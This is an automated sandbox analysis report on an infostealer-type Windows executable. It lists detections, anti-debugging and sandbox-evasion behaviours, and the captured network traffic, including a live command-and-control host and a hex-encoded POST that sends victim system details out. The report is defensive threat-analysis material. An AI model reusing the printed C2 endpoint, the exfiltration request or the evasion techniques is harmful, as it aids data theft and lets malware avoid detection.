Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5Jat5RkD3a.exe

Overview

General Information

Sample name:5Jat5RkD3a.exe
renamed because original name is a hash value
Original sample name:8c39c06251f42e3b7ebc710fe06753aa.exe
Analysis ID:1578893
MD5:8c39c06251f42e3b7ebc710fe06753aa
SHA1:cee1dc7963d47a34b22683f42fcd125478a0d586
SHA256:68d042b3b794b314a80918bf399bafbace6cff82e4d567f9b42f3699d3c44c35
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 5Jat5RkD3a.exe (PID: 7928 cmdline: "C:\Users\user\Desktop\5Jat5RkD3a.exe" MD5: 8C39C06251F42E3B7EBC710FE06753AA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 5Jat5RkD3a.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 5Jat5RkD3a.exeVirustotal: Detection: 49%Perma Link
Source: 5Jat5RkD3a.exeReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 5Jat5RkD3a.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0029DCF0
Source: 5Jat5RkD3a.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_002DA5B0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002DA7F0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_002DA7F0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_002DA7F0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_002DA7F0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_002DA7F0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002DA7F0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002DB560
Source: 5Jat5RkD3a.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0027255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0027255D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002729FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 504728Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 39 39 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0033A8C0 recvfrom,0_2_0033A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknownHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 504728Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 39 39 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560405942.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538068178.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1537557313.00000000017D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850se
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 5Jat5RkD3a.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 5Jat5RkD3a.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: 5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 5Jat5RkD3a.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

System Summary

barindex
PE file contains section with special chars
Source: 5Jat5RkD3a.exeStatic PE information: section name:
Source: 5Jat5RkD3a.exeStatic PE information: section name: .idata
Source: 5Jat5RkD3a.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002805B00_2_002805B0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00286FA00_2_00286FA0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002AF1000_2_002AF100
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0033B1800_2_0033B180
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005FE0300_2_005FE030
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_003400E00_2_003400E0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002D62100_2_002D6210
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0033C3200_2_0033C320
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_003404200_2_00340420
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005C44100_2_005C4410
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0027E6200_2_0027E620
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0033C7700_2_0033C770
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005D67300_2_005D6730
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002DA7F00_2_002DA7F0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005F47800_2_005F4780
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0032C9000_2_0032C900
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0027A9600_2_0027A960
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002849400_2_00284940
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00446AC00_2_00446AC0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0052AAC00_2_0052AAC0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00404B600_2_00404B60
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0052AB2C0_2_0052AB2C
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0027CBB00_2_0027CBB0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005E8BF00_2_005E8BF0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005FCC700_2_005FCC70
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005F4D400_2_005F4D40
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00430D800_2_00430D80
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005ECD800_2_005ECD80
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0058AE300_2_0058AE30
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00294F700_2_00294F70
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0033EF900_2_0033EF90
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00338F900_2_00338F90
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005C2F900_2_005C2F90
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002810E60_2_002810E6
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005DD4300_2_005DD430
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005E35B00_2_005E35B0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_006017800_2_00601780
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_003298800_2_00329880
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005C99200_2_005C9920
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005F3A700_2_005F3A70
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005E1BD00_2_005E1BD0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002B1BE00_2_002B1BE0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005D7CC00_2_005D7CC0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00529C800_2_00529C80
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00285DB00_2_00285DB0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00295EB00_2_00295EB0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_00283ED00_2_00283ED0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_005F9FE00_2_005F9FE0
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 0028CD40 appears 80 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 00427220 appears 103 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 002B50A0 appears 101 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 0027CAA0 appears 64 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 0044CBC0 appears 104 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 002771E0 appears 47 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 0027C960 appears 37 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 002B5340 appears 50 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 003544A0 appears 76 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 002773F0 appears 114 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 002B4F40 appears 346 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 002B4FD0 appears 290 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 002775A0 appears 706 times
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: String function: 0028CCD0 appears 54 times
Source: 5Jat5RkD3a.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 5Jat5RkD3a.exeStatic PE information: Section: pvfmcbmp ZLIB complexity 0.9944063789851978
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_0027255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0027255D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeCode function: 0_2_002729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002729FF
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 5Jat5RkD3a.exeVirustotal: Detection: 49%
Source: 5Jat5RkD3a.exeReversingLabs: Detection: 52%
Source: 5Jat5RkD3a.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 5Jat5RkD3a.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeSection loaded: windows.storage.dllJump to behavior
